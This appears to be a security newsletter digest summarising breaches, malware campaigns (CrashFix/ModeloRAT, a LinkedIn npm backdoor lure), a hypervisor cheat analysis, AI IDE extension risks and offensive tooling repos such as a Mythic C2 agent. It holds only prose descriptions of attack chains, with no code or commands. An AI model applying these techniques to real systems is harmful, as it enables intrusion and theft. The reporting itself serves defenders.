Attacks & Vulnerabilities |
Flickr emails users about data breach, pins it on 3rd party (1 minute read)
Flickr disclosed a data breach stemming from a compromised third-party email service provider, with attackers potentially accessing names, email addresses, usernames, IP addresses, general locations, and platform activity. The company shut down access to the affected system within hours and notified data protection authorities in both Europe and the US. No passwords or financial data were reportedly exposed, though Flickr has urged users to watch for phishing attempts and review account settings. |
New Clickfix variant 'CrashFix' deploying Python Remote Access Trojan (9 minute read)
Microsoft identified a new ClickFix variant dubbed "CrashFix" that uses a malicious Chrome extension impersonating uBlock Origin Lite to deliberately crash victims' browsers, then tricks users into executing clipboard-copied commands via a fake security warning. The attack chain abuses the legitimate Windows utility finger.exe (renamed to ct.exe) to retrieve obfuscated PowerShell payloads, ultimately deploying a Python-based RAT called ModeloRAT that selectively targets domain-joined enterprise systems for further compromise. ModeloRAT beacons to hardcoded C2 servers over HTTP, establishes persistence via registry Run keys and scheduled tasks, and conducts network reconnaissance using native Windows commands like nltest and net use. |
Payments Platform BridgePay Confirms Ransomware Attack Behind Outage (2 minute read)
BridgePay Networks Solutions has confirmed that an ongoing outage in its payment gateway and other services is caused by a ransomware attack. The company has stated that it is confident that payment details and credit card information have not been compromised. BridgePay has not responded to questions about which ransomware gang is behind the attack. |
|
Deobfuscation and Analysis of Ring-1.io (19 minute read)
Researchers reverse-engineered ring-1.io, a prominent game cheat provider, revealing a sophisticated attack chain that replaces EFI boot binaries, injects into Hyper-V via VMEXIT hooks, and uses EPT-based memory redirection to hide malicious code from kernel-level anti-cheat systems. The implant operates across three privilege boundaries — guest user mode, guest kernel mode, and VMX root — using cloned page tables, CR3 spoofing, and shadow pages filled with 0xCE bytes to evade detection. The analysis also outlines multiple detection strategies, including shadow PML4E scanning, Intel Processor Trace analysis, and RWX anomaly detection under HVCI, emphasizing that Secure Boot enforcement would prevent the entire attack chain. |
How We Prevented Cursor, Windsurf, & Google Antigravity from Recommending Malware (6 minute read)
Researchers discovered that AI IDEs forked from VSCode, including Cursor, Windsurf, and Google Antigravity, inherited hardcoded extension recommendation lists pointing to Microsoft marketplace namespaces that were unclaimed on OpenVSX, the open-source alternative these IDEs actually use. An attacker could have registered these unclaimed namespaces and uploaded malicious extensions that the IDEs would proactively recommend to millions of developers based on file types or installed software. The researchers preemptively claimed the vulnerable namespaces and coordinated with the Eclipse Foundation and vendors to remediate, noting that over 1,000 developers installed their inert placeholder extensions simply because their IDE recommended them. |
Goodbye to Static Credentials: Embrace Modern Identity Practices (6 minute read)
Static credentials are prone to leakage, can cause significant damage, and can be difficult to rotate. To prevent this, many organizations adopted interim secrets management solutions, such as AWS Secrets Manager and HashiCorp Vault. In the long term, organizations should shift to modern, short-lived credentials, such as managed identities (e.g., AWS roles), federated identities, and application-specific methods for Kubernetes and AI agents. |
|
Hermes (GitHub Repo) (1 minute read)
Hermes is a Linux-only Mythic C2 agent written in Python, featuring 18 built-in commands for reconnaissance, file operations, and shell execution. The agent communicates via HTTP, using Mythic's EKE + AES encryption, and can be deployed as a Python script or a PyInstaller binary. It supports core post-exploitation tasks, including process listing, network enumeration, file transfer, and directory manipulation on Linux targets. |
SharePointDumper (GitHub Repo)
SharePointDumper is a PowerShell-based extraction and auditing utility that enumerates SharePoint sites a user has access to via Microsoft Graph and downloads files via SharePoint. |
Clawdstrike (GitHub Repo)
Clawdstrike provides runtime security enforcement for agents. It is designed for developers building EDRs and security solutions on top of OpenClaw. |
|
'Encrypt It Already' Campaign Pushes Big Tech to Prioritize E2E Encryption (6 minute read)
The Electronic Frontier Foundation launched its "Encrypt It Already" campaign, urging major tech companies such as Bluesky, Google, and Ring to fulfill their promises to implement end-to-end encryption by default across their platforms. The initiative highlights that many companies either offer E2EE as an opt-in feature or have delayed rolling it out entirely, leaving users exposed, particularly as AI agents increasingly access sensitive communications with less human oversight. EFF noted that several targeted companies are "highly likely" to enable these features within the year, but stressed that default-on encryption remains critical since most users never change default settings. |
A LinkedIn Job Offer Tried to Install Malware on My Machine (10 minute read)
The author received a LinkedIn post about a freelance opportunity to evaluate the codebase of a real estate tech platform with a legitimate-looking platform and a generous budget. The author accepted the offer and was given access to the codebase, but missed red flags such as a missed call with their Tech Manager, suspicious git history, and suspicious indicators in their contact's LinkedIn profile. Upon reviewing the repository, the author found an npm post-install script that would download a C2 backdoor, exfiltrate sensitive files, and capture keystrokes. |
Sixteen Claude AI agents working together created a new C compiler (5 minute read)
Anthropic researcher Nicholas Carlini used 16 parallel Claude Opus 4.6 agents coordinating via a shared Git repository to produce a 100,000-line Rust-based C compiler capable of compiling a bootable Linux kernel across x86, ARM, and RISC-V architectures. The two-week, $20,000 experiment achieved a 99% pass rate on the GCC torture test suite but hit a practical ceiling around 100,000 lines where new fixes frequently broke existing functionality, suggesting current limits for autonomous agentic coding. The researcher noted significant human scaffolding was required — including custom test harnesses, context-aware output filtering, and time-boxing — raising concerns about developers deploying AI-generated software they have never personally verified. |
|
| Love TLDR? Tell your friends and get rewards! | | Share your referral link below with friends to get free TLDR swag! | | | |
| Track your referrals here. |
|
| |
0 Comments